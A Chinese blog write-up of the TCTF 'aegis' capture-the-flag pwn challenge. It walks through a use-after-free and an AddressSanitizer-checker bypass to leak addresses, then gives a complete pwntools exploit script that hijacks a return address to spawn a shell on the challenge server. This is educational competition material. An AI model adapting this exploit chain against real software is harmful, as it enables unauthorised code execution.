TCTF-aegis详解

最新推荐文章于 2022-09-30 09:07:50 发布
最新推荐文章于 2022-09-30 09:07:50 发布
阅读量578 收藏 1
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/w12315q/article/details/88796393
版权

TCTF-aegis详解

题目很好值得学习一下

静态分析

拿到题目仔细的分析能发现这是address sanitizer机制可以检测各种的错误,并且自己建立了一个malloc机制。所以glibc的那一套堆分配并没有作用。

main

在这里插入图片描述
实现一个菜单功能

add_note在这里插入图片描述

先加入content然后加入id,地址是存在一个固定的地址,之后可以在动态调试的时候看的出来。同时可以计算出check的地址,也是不会更改的。

show_note

在这里插入图片描述
普通的一个show函数

update_note

在这里插入图片描述
在此处有一个可能溢出的地方,但是由于会有checker一溢出就会造成crash,具体动态调试的时候可以发现。

delte_note

在这里插入图片描述
存在uaf,后面可能可以利用,直接的利用是不存的会被一只checker

secret

在这里插入图片描述
可以任意地址写0,但是只能写一次0,我猜是吧某个checker改为0然后进行一个利用。

动态分析

这个题目还是要靠多动态分析才能出来,首先来几个text看看checker的报错

error

在这里插入图片描述
这是heap use after free后的结果,看的出他check的位置,同时看报错能发现写入00可以绕过checkser。同时溢出也会报错。

heap

在这里插入图片描述
地址与分布,并且不会改变,从这里可以看出heap储存的规律大概是一个heap,然后一个索引的heap指针,那么如果我们能控制指针指向说不定能做很多事情。

思路part1

有一定思路后开始进行尝试,首先调试heap and checker 让其能制造一些可用的溢出来。

一、由逆向可知每次updata会检查cfi_check函数,然后根据heap记录的大小来进行输入,如果我们可以进行一个overflow去写一个0就能做出更大的溢出接下里尝试一下。

overheap_sucess

这里就不具体写了,需要读者自己去调试,找到合适的size去改写,然后制造一个pointer to leak,最后的效果是达到一个指针指向heap就可以造成leak了。
在这里插入图片描述

part2

可以做到leak,我们能得到的programmer base address和libc base address这时候发现给了libc赶紧吧one_gadget算出来先。再去思考应该写哪里。

坑1

会发现尝试写一个malloc-hook(内置的机制非glibc)会有报错,跟进报错的函数,会检查一个指针是否完好,不完好就会执行
在这里插入图片描述

在这里插入图片描述
这里可以发现会调用一个函数,这个函数在跟进去能发现会有一个call rax,溯源rax的位置是否能被利用。发现他是在bss段是可进行更改的一个值,于是明确了改的思路。

坑2

在这里插入图片描述
直接写one发现是不可行的,只能继续想,发现其他函数还是可以的,结果发现rdi在栈上想可能可以利用栈溢出进行一个利用。

final

最后发现是可利用的,改写栈上的ret地址就可以达到一个getshell的作用。关于等下exp上的’\x00’*0x100是为达到清空栈满足onegadget条件

exp:
from pwn import *

debug=1
#context.log_level='debug'
context.log_level = 'debug'

if debug:
    p=process('./aegis',env={'LD_PRELOAD':'./libc-2.27.so'})
    gdb.attach(p)
else:
    p=remote('111.186.63.209',6666)

def get(x):
    return p.recvuntil(x)
    
def pu(x):
    p.send(x)

def pu_enter(x):
    p.sendline(x)

def add(sz,content,id):
    pu_enter('1')
    get('Size')
    pu_enter(str(sz))
    get('Content')
    pu(content)
    get('ID')
    pu_enter(str(id))
    get('Choice: ')

def show(idx):
    pu_enter('2')
    get('Index')
    pu_enter(str(idx))
    

def update(idx,content,id):
    pu_enter('3')
    get('Index')
    pu_enter(str(idx))
    get('Content: ')
    pu(content)
    get('New ID:')
    pu_enter(str(id))
    get('Choice:' )

def delete(idx):
    pu_enter('4')
    get('Index')
    pu_enter(str(idx))
    get('Choice:')

def secret(addr):
    pu_enter('666')
    get('Lucky Number: ')
    pu_enter(str(addr))
    get('Choice:')

add(0x10,'a'*8,0x123456789abcdef)
for i in range(4):
    add(0x10,'b'*0x8,123)

#0x602000000000
#0x7fff8000

secret(0xc047fff8008-4)
update(0,'\x02'*0x12,0x111111111)
update(0,'\x02'*0x10+p64(0x02ffffff00000002)[:7],0x01f000ff1002ff)
delete(0)
#raw_input("#")
add(0x10,p64(0x602000000018),0)
#raw_input("#")
show(0)

get('Content: ')
addr = u64(get('\n')[:-1]+'\x00\x00')
print addr
pbase = addr -0x114AB0
get('Choice: ')

update(5,p64(pbase+0x347DF0)[:2],(pbase+0x347DF0)>>8)
show(0)

get('Content: ')
addr = u64(get('\n')[:-1]+'\x00\x00')
base = addr -0xE4FA0
get('Choice: ')

update(5,p64(pbase+0x0FB08A0),p64(pbase+0x7AE140))
#update(5,p64(pbase+0xfb08a0+0x28),(pbase+0xfb08a0+0x28)>>8)
raw_input("aa")
pu_enter('3')
get('Index')
pu_enter('0')
get('Content')
#raw_input(hex(pbase+0x7AE140))
pu(p64(base+524464)[:7])
#get('ID')
raw_input("#get"+str(hex(pbase+0x7AE140)))
payload = 'a'*471+p64(base+0x4f322)+'\x00'*0x100
#raw_input(hex(base + 0x4f322))
pu_enter(payload)


p.interactive()

####总结
题目难的真实。。。

Peanuts_CTF
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
aegis
03-13
aegis
Aegis-开源
05-28
Aegis是基于事务的软件配置管理系统。 它提供了一个框架,开发人员团队可以在该框架中独立进行程序的许多更改,而Aegis协调将这些更改重新集成到主菜单中。
开源的工控协议fuzzing框架Aegis
xumesang的专栏
04-27 4091
原文章是微信上的,可以访问这个地址:https://github.com/automatak 筒子们是不是对复杂多样的工业控制协议安全性测试工作发愁呢?S给你介绍个东东,看看有用哞? ICS / SCADA 应用需要鲁棒性高的组件,Aegis(宙斯盾)是一种智能 fuzzing 框架,支持部署对在生产系统中的工控协议的鲁棒性和通信软件的安全问题进行fuzzing测试。
NTCTF(技术性网络空间威胁框架, Technical Cyber Threat Framework)
shutdown -s -t
10-24 1422
CTF(网络空间威胁框架,Cyber Threat Framework),也叫NSA CTF(NTCTF),是一种参考了MITRE的 ATT&CK威胁模型框架的通用描述语言。CTF的好处是提供了一种通用语言,用于描述和交流有关网络威胁活动的信息。CTF是对之前网络威胁词汇不一致描述的巨大改进。 遵循一种通用方法有助于: 建立一个共同的本体论并增强信息共享,因为将独特的模型映射到一个通用标准,比相互映射要容易; 以直截了当的方式描述和分类威胁活动,以支持从战略决策到分析和网络安全措施的任务,以及从通
aegis:Linux,FreeBSD,NetBSD,OpenBSD和Windows调试检测库。 支持C和Go
05-11
Aegis是一个库,可让您检测是否在Linux , FreeBSD , NetBSD , OpenBSD和Windows上调试软件。 您可以从C本地使用它,也可以使用Go绑定。 这个名字是关于一个糟糕的缩写:一个N个E LF的- G I nspection小号ignalling。 如果您迷上了希腊神话,您应该知道“ Aegis是Athena给Perseus提供的盾牌名称,以帮助他杀死Medusa 。 如果你正在使用它Windows理解为A N个E xecutable的- G I nspection小号ignalling;) 在Windows我们有很多方法可以轻松进行这种检测。 相反,在Unix世界中,我们没有任何标准方法。 Aegis试图填补这一空白。 您可以将Aegis用作anti-debugging mitigation或debugging facility 。 这仅取决于您和您
0ctf-tctf-2020:0CTFTCTF 2020质量解决方案
03-26
0ctf-tctf-2020:0CTFTCTF 2020质量解决方案
【技术分享】TCTF2021-1linephp 题解 .pdf
09-05
【技术分享】TCTF2021-1linephp 题解主要涉及Web安全领域的文件包含漏洞、ZIP协议利用以及PHP的session机制。这道题目要求参赛者利用有限制的任意文件包含漏洞,结合PHP环境中的ZIP扩展和session功能,实现远程代码...
My-CTF-Challenges
05-16
其中的一个具体挑战是"TCTF2018_决赛",这可能是一个在2018年举行的网络安全技术对抗赛的决赛环节。 【描述】提到的挑战"给我看一下贝壳"是一个以Java语言为基础的问题,涉及到Spring框架的自动绑定和反序列化机制...
0ctf_tctf_2018
05-16
0 CTF / TCTF 2018 0CTF / TCTF 2018决赛中的一些加密挑战
web-ctf-writeups
05-10
web-ctf-writeups ...0CTF/TCTF 大部分题解 https://www.lorexxar.cn/2018/04/05/0ctf2018-other/ EZDOOR https://www.cdxy.me/?p=790 https://blog.zsxsoft.com/post/36 2018 qUALS Bl0g https://blog
AEGIS算法的弱状态分析
02-08
AEGIS算法的弱状态分析
java8看不到源码-aegis:基于SpringBoot的注解插件,实现了对接口的防重放攻击,校验请求超时,校验请求签名
06-04
java8 看不到源码 基于Java8 + Spring Boot打造Http请求拦截验证框架 :face_savoring_food: 花10分钟学会它做点什么,它会帮你检查Http Request参数。 可以防御重放攻击,校验参数被修改(数字签名) ,校验请求超时 :paw_prints: | :new_moon_face: :China: 什么是宙斯盾? Aegis追求简单的框架,所以使用最新的技术,拦截每一个http请求,然后检查参数,你可以根据需要改变每一个检查策略。 如果你喜欢尝试一些有趣的东西,我相信你会喜欢的。 如果你觉得这个项目不错可以支持一下 :smiling_face_with_smiling_eyes: 快速开始 使用Maven运行: 创建一个基本的Maven项目 < dependency > < groupId >com.github.com.erictao2</ groupId > < artifactId >aegis-api</ artifactId > < version >1.0.1</ version > </ dependency > 您必须在项目中使用 Spirng Boot。 然后在你的Controller或Method添加注解,具体注解使用请参考文档! 内容 宙斯盾注解 现在 Aegis 有 3
java之webservice_aegis.xml学习
12-01
webservice_aegis.xml配置
aegis linux,aegis/Linux软件漏洞FAQ.md at master · AlibabaCloudDocs/aegis · GitHub
weixin_39869432的博客
05-26 522
Linux软件漏洞FAQ {#concept_58649_zh .concept}本文档列举了Linux软件漏洞功能相关的常见问题,您可以在问题列表中选择您想要了解的问题,并单击该问题查看相关解答。说明: 本文档仅适用于以下操作系统:CentOS、Ubuntu、及 Debian。如何获取当前软件版本漏洞信息? {#1 .section}一般情况下,系统软件漏洞(CVE 漏洞)是通过软件包版本匹配的...
Aegis 简介
weixin_30426065的博客
12-19 1353
是一个数据绑定 API,用于在 Java 对象与 XML 文档之间执行映射。 使用Aegis的好处:Aegis 使用外部映射文件为开发人员提供更多的控制权和灵活性,使他们能够根据其项目需要来定制映射。Aegis 可以保持 Java 类的整洁。与 JAXB 不同的是,无需提供注释便可满足数据绑定需求。用户可以使用外部映射文件控制绑定。Aegis 允许您选择是否使用注释。因此,如果您不想使...
LWN: Control-flow integrity in 5.13!
Linux News搬运工
06-08 883
关注了就能看到更多这么棒的文章哦~Control-flow integrity in 5.13By Jonathan CorbetMay 21, 2021DeepL assisted tr...
linux命令:ps、netstat
qq_16268979的博客
11-15 1216
日常我们查看服务,进程,端口,路径等等都可以用到这两个命令,因为我记得也不够详细,这里为了提升自己运用能力,特写此文章。
cfi那些事
蚁景网安学院
09-01 433
原创稿件征集 邮箱:edu@antvsion.com QQ:3200599554 黑客与极客相关,互联网安全领域里的热点话题漏洞、技术相关的调查或分析,稿件通过并发布还能收获200-800元不等的稿酬。 本文作者:s3cunDa 控制流完整性 针对于漏洞利用,最终的效果和目的就是劫持控制流,控制目标程序做一些他本来做不了的事情。可以达到这一目的的方式有很多,比如ROP、劫持函数指针等等。而这些都来自于软件中一些漏洞,如缓冲区溢出、释放后利用等等。最初防御的方式就是头疼医头,脚疼医脚,哪里出现了漏洞比如缓.
LINUX 服务器中病毒了,后来追踪到的一个机器运行脚本,研究了一下对于初学者shell的人有很大的帮助
80后大叔爱学习
09-30 2431
服务器中病毒了,后来追踪到的一个机器运行脚本,研究了一下对于初学者shell的人有很大的帮助
Nacos JRaft Hessian 反序列化 RCE 分析.pdf
最新发布
04-22
这篇文档还提到了一些外部资源,如博客文章(<http://www.bmth666.cn/bmth_blog/2023/02/07/0CTF-TCTF-2022-hessian-onlyJdk>)和阿里云的安全通报(),它们可能提供了更具体的案例研究和解决方案建议。 总结来说,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值